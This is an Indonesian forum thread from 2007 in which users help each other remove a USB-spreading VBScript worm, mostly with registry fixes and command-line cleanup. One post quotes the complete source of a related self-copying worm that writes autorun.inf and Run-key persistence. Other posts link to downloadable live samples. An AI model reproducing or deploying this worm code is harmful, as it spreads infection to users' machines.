OprekPC.com :: [ask] 4n694-24y.dll.vbs

adrian_69 · Posted: Tue Mar 13, 2007 9:10 pm **[ask] 4n694-24y.dll.vbs**

virusnya berupa file r4n694-24y.dll.vbs
kayakny virus ni nyerang IE sama installshield wizard, soalny pas buka IE di windowsny ntar ada tulisan "hacked by r4n694-24y" n ada pesen si pembuat di properties my computer dan yg paling ngeselin ini virus bikin instalshield ga jalan alias kompie jai gabisa install apa apa...arrrggghhh!!!!
ada yg tw obat ni virus kg? masa musti instal ulang windows sih....T_T

xaviero · Posted: Tue Mar 13, 2007 10:08 pm

rangga-ray ... :lol:

report dunkz, selaen instalshield, apa lagi yg rusak ?

mungkin gini, boot pake bart PE, terus scan pake NOD...
sementara itu dulu...

kalo ga ada NOD dan bartPE, modal win XP boot CD dulu...
booting pake win XP boot CD, masuk ke recovery mode (tau lah ya??)

setelah masuk sampai C:\> prompt, masuk ke folder windows\system32

c:\>cd windows\system32

ane kira2 aja, dan menurut statistik, kebanyakan virus lokal masi menggunakan VB. apalagi ini virus berekstensi vbs (vb script)

kemudian cari file ini "MSVBVM60.dll" di folder windows\system32

cari dengan menggunakan command dir

c:\windows\system32>dir MSVBVM60.dll
c:\windows\system32>dir /ah MSVBVM60.dll

/ah disini jaga2 kalo itu .dll di hidden ama virii...

kalo ketemu, langsung kopi ke folder laen... misal ke windows\temp

c:\windows\system32>copy msvbvm60.dll "c:\windows\temp"

kemudian, hapus file .dll tadi yg difolder windows\system32
reboot system , masuk kembali ke windows

ok sekarang kita buat obat registri nya.
kopi paste aja code dibawah ini pake notepad, simpan dengan nama_file_terserah.inf , kalo udah kelar... klik kanan filenya, terus pilih install...

Code:

[Version]
Signature="$Chicago$"
Provider=xaviero

[DefaultInstall]
AddReg=pukulanMaut
DelReg=tendanganMaut

[pukulanMaut]
HKLM, Software\CLASSES\batfile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\comfile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\exefile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\piffile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\regfile\shell\open\command,,,"regedit.exe "%1""
HKLM, Software\CLASSES\scrfile\shell\open\command,,,"""%1"" %*"
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, Shell,0, "Explorer.exe"
HKLM, SYSTEM\ControlSet001\Control\SafeBoot, AlternateShell,0, "cmd.exe"
HKLM, SYSTEM\ControlSet003\Control\SafeBoot, AlternateShell,0, "cmd.exe"
HKLM, SYSTEM\CurrentControlSet\Control\SafeBoot, AlternateShell,0, "cmd.exe"
HKLM, SOFTWARE\Classes\exefile,,,application
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug, debugger,0, "

[tendanganMaut]
HKCU, Software\Microsoft\Windows\CurrentVersion\Run, MSMSGS
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Ekplorer
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableRegistryTools
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableTaskMgr
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableCMD
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,NoFolderOptions
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Run, System Monitoring
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System,DisableRegistryTools
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System,DisableTaskMgr
HKLM, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,NoFolderOptions
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, LegalNoticeCaption
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, LegalNoticeText
HKLM, SOFTWARE\Policies\Microsoft\Windows\Installer, DisableMSI
HKLM, SOFTWARE\Policies\Microsoft\Windows\Installer, LimitSystemRestoreCheckpointing
HKLM, SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore, DisableConfig
HKLM, SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore, DisableSR

dalam hal ini, karena ga pernah nemu virus ini, ane ga tau tipe2 file apa aja yg diinfeksi, jd ente kudu search manual, biasanya di C:\Windows, \system32, C:\Document and settings , dsb

cari file2 yg mencurigakan, kalo ketemu apus aja...

oh iya, jangan lupa mengembalikan .dll yg udah di copy tadi kembali ke c:\windows\system32

moga2 bisa ilang

trus untuk balikin nama komputer ma nama company
masuk ke regedit, langsung ke

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion

edit value RegisteredOrganization ganti dengan nama company
edit value RegisteredOwner ganti dengan nama anda

keluar regedit---kelar

balthaZor · Posted: Tue Mar 13, 2007 11:00 pm

tolong dong, kalo bisa file r4n694-24y.dll.vbs di upload.
misal ke http://www.mytempdir.com/
jgn lupa di zip/rar+password dulu.

biasanya dia kan ada di flashdisk.
boleh juga sekalian file2 lainya spt desktop.ini autorun.inf folder.htt dan exe ikut diupload.
thx.

xaviero · Posted: Tue Mar 13, 2007 11:11 pm

mau source nya ya jor ???

balthaZor · Posted: Wed Mar 14, 2007 12:17 am

jgn ini varian dari ente ya.. :lol:

xaviero · Posted: Wed Mar 14, 2007 1:21 am

kekekkeke... mana mampu lah ane buat virii jor...

iya denk, bole tuh diposting oleh TS

OIR · Posted: Thu Mar 15, 2007 9:18 am

Maap...
Sudah dicoba av made in indonesia misal cav/pcmav/ansav dg versi/updet terbaru?

adrian_69 · Posted: Sun Mar 18, 2007 8:14 pm

pake PCMAV kagak mempan make CLAMAV atw apa gitu (tau deh buatan lokal pa bukan dikasi temen si) n Av sejenisnya lah kagak mao juga, akhirnya pasrah..make vista ajah (dikasi temen juga)bis ud puyeng kaga bisa install apa-apa...
hmmm nanti dh kalo nemu lagi virusnya gw share....wew...masi trauma soalnya males nyolok flasdisk sembarangan...

adrian_69 · Posted: Mon Mar 19, 2007 7:13 pm

xaviero · Posted: Mon Mar 19, 2007 9:39 pm

hhhmm, tunggu dulu... virus nya memang dah ga bisa beranak pinak..

tp anda lupa, msvbvm60.dll nya dah di pindah lom ?

terus, cek di c: , d: , e: dan drive root laen,
ada ga yg bernama

autoexec.ini
autoexec.inf
autoexec.bat
autoexec.vbs

file2 tersebut di hidden ma virus, coba cek dari folder options dulu...
kalo ga bisa, coba dari command prompt dengan perintah

Code:

c:\>dir /ah auto*.*

dicoba lagi yah... ini langkah2 menghilangkan virus tanpa pake AV

Pemula kompie · baru ng-Oprek Joined: 17 Jan 2005 Posts: 78

Ini boleh dapet dari forum tetangga http://howto.redcomputer....by_godzilla.php coba dilihat disitu cara bersihin-nya. Gak pake AV kok itu caranya. Soalnya baru kena juga gua. :iconbiggrin:

Trus semisalnya udah ikutin langkah di link tersebut dan masih ada drive yg gak bisa di doble klik. Coba deh cari pake fungsi search-nya windows tapi jgn lupa di include yg hidden file ama system file juga. Yg musti dicari adalah file autorun.inf Biasanya sih ada di root folder. Misalnya C:. D:, E: gitu. Nah, klo dah ketemu dibuka aja dilihat isinya bener nggak ada yg autoexecute *.VBS-nya klo ada yah tinggal hapus filenya. Selesai dah.

xaviero · Posted: Thu Mar 22, 2007 10:56 am

hhhmm thanks pemula kompie

berarti ane cuman kurang file ms32dll doank ya.... mayan canggih nih virii..

kesinobu · Posted: Mon Mar 26, 2007 12:32 pm

lo... kok mirip kayak vires.A??????
codenya kayak gini>>>

Quote:

'My name is Slow but sure V0.05
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe MS32DLL.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "\MS32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs")
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\MS32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs")
tf.attributes =39
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
end if
next
set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL",winpath&"\MS32DLL.dll.vbs"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by Godzilla"
rg.regwrite "HKCR\vbsfile\DefaultIcon","shell32.dll,2"
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sd = createobject("Wscript.shell")
sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname

doi bikin outurun, di semua drive... kalo di kelik doi bakalan memproses ms32dll.dll.vbs! liat aja prosesnya pake aplikasi pihak ketiga. semakin sering di klik... maka prosesya bakalan makin banyak! Karena akoe panik dokumen ku di enkripsi menjadi 10-12 kb dengan ekstensio exe. aku apus pake pcmav... tapi belum bersih semua... makanya aku akoe delete registry

Quote:

REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\D\Shell\AutoRun\command]
@="C:\\WINDOWS\\system32\\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL wscript.exe MS32DLL.dll.vbs"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\G\Shell\AutoRun\command]
@="C:\\WINDOWS\\system32\\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL wscript.exe MS32DLL.dll.vbs"

tapi kalo di klik drive nya sekarang kaga bisa? harus di klik kanan open? cara bersihin yang normal gimana segh???

slow but sure??? virus norak!
:wav:

xaviero · Posted: Mon Mar 26, 2007 1:08 pm

hapus semua autoexec.* di masing2 root direktori... itu juga setelah di scan dengan AV.

kalo antisipasi manual , coba seperti yg ane post diatas, 2 file msvbvm60 ama ms32dll di pindahkan duluw...

kemudian segera patching registry nya dengan yang diatas juga...

balthaZor · Posted: Mon May 07, 2007 10:42 pm

ini sample-nya :iconbiggrin:

thx to POTAR82

Code:

http://rapidshare.com/files/30001135/r4n694-24y.dll2.rar
http://www.mytempdir.com/1320878
Size: 6.5KB
MD5 : 975214e957e5b46991896b6da9a34df7

NAV dgn update 22 Feb 2007 akan mendetek sbg varian VBS.Solow
http://www.symantec.com/s...-022116-1047-99
http://www.symantec.com/s...-022815-2726-99

javaid · Posted: Thu Jun 14, 2007 10:41 pm **Virus berextensi dll.vbs**

Pusing Seharian Oprek Kompi akhirnya Dengan Menyatukan Dua Otak Terkuak Juga Bagai mana Aksi Dari File Yang extension-nya .dll.vbs

setelah seharian aku orek PC aku bersama teman aku akhirnya bisa menyelesaikan/menguraikan aksi dari virus contoh (win32.dll.vbs). Karena iseng aku browsing pake Opera terus aku klik di addres barnya
D: ==> yang langsung menunjukkan apa saja isi dari drive D

saya langsung kaget waktu lihat disitu ada file yang namanya Win32.dll.vbs wah ternyata ini dia virusnya setelah seharian aku sourcebersama teman di batam dengan membahas nya melalui Yahoo Messanger.

Ga usah basa basi langsung aja aku rubah scriptnya menjadi Virus_cinta.dll.vbs
http://www.fileden.com/fi...74314/Virus.rar

Disitu sudah aku kasih tau pembahasannya walaupun hanya beberapa persen saja, soalnya taunya cuma segitu doank........

balthaZor · Posted: Fri Jun 15, 2007 11:23 am

javaid, postingannya saya merge ke thread ini ya..

adrian_69, judul saya ganti dari "[ask] wah ini virus apa y?" jadi "[ask] 4n694-24y.dll.vbs"

adrian_69 · Posted: Sat Jun 16, 2007 7:58 pm

oh ya....r4n694-24y.dll.vbs...ud aman kedetek ma pcmav n antivirus laen...tp kayakny dl pas kna tuh virus bangsad bener....bikin kompi kgk bisa jalanin instalshield wizard...jangan2 ada varian laennya

javaid · Posted: Sat Jun 16, 2007 9:26 pm

Pantes ga ada yang Psting ke gwe.....

Tapi Gpp semua dah tau kan, tuh virus nyerang Registry trus udah gw bahas juga
dan sekarang gimana balikin semuanya secara normal, and byar semua
drive bisa di Double klik..............

Coz semua dah gw coba bahkan gw bahas bedua ama temen gw
ga tanggung2 seharian bahas tuh virus
tapi tetep aja ga kena..........

momoi · belajar ng-Oprek Joined: 15 Sep 2006 Posts: 259

Perasaan kemaren dulu nemuin kasus win32.dll.vbs, tapi bisa lgsg diberesin sama GAV.
Txs 4 GUCUP :hello1:

balthaZor · Posted: Thu Aug 16, 2007 11:29 am

pastikan dulu.. file-nya hilang apa disembunyikan si malware?

jalankan perintah ini di command prompt:

Code:

ATTRIB -H -S -R X:\*.* /S /D
DEL /F X:\autorun.inf
DEL /F X:\desktop.ini

catatan: ganti "X" dgn abjad drive Anda.

OIR · Posted: Thu Aug 16, 2007 1:41 pm

jackofalltrade · baru ng-Oprek Joined: 14 Aug 2007 Posts: 1

thanx banget Bro ...dah gw coba tuh pake attrib sebelumnya, tapi gak bisa baru gw coba pake GDB 3.02. trus gw pegangan (kan bingung) .
emang sih MB di Ext HDD dah 0 gitu.....
jadi gimana dong ..?